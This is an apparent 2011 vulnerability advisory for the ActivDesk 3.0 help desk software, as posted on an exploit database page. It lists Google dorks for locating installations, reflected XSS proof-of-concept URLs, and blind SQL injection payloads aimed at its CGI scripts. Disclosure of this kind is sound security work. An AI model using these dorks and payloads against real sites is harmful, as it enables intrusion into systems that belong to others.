ActivDesk 3.0 multiple security vulnerabilities
| EKU-ID: 609 | CVE: | OSVDB-ID: |
| Author: Brendan Coles | Published: 2011-06-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 609 | CVE: | OSVDB-ID: |
| Author: Brendan Coles | Published: 2011-06-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
ActivDesk 3.0 multiple security vulnerabilities
# Date: 2011-06-24
# Author: Brendan Coles <bcoles@gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>>
# Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/
# Software: ActivDesk
# Version: <= 3.0
# Homepage: http://www.webhelpdesk-software.com/
# Google Dorks:
# inurl:kbcat.cgi ext:cgi
# "Help Desk Powered By ActivDesk"
# Vendor: FocalMedia
# Homepage: http://www.focalmedia.net/
# Notified: 2011-06-24 - Ticket# 67120010491
# Cross-Site Scripting (XSS):
http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script>
http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script>
http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script>
http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>
# Blind SQL Injection:
http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''='
http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='